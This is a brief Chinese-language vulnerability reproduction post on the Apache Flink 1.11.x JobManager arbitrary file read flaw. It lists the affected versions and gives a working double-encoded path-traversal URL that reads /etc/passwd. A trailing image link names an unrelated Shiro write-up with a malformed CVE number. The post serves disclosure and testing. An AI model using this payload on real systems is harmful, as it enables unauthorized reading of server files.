文章目录
一、漏洞简介二、漏洞复现一、漏洞简介
Apache Flink 1.11.0中引入的更改,允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。但是访问仅限于JobManager进程可访问的文件。
影响版本:1.11.0、1.11.1、1.11.2
二、漏洞复现
Payload:192.168.198.132:8081/#/job-manager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
对/进行二次编码%252f
![[ 漏洞复现篇 ] Apache Shiro 身份认证绕过漏洞 (CVE--32532)](https://700zi.400zi.cn/uploadfile/img/15/281/e90e804ae60608706f7de2749ac177d0.jpg)
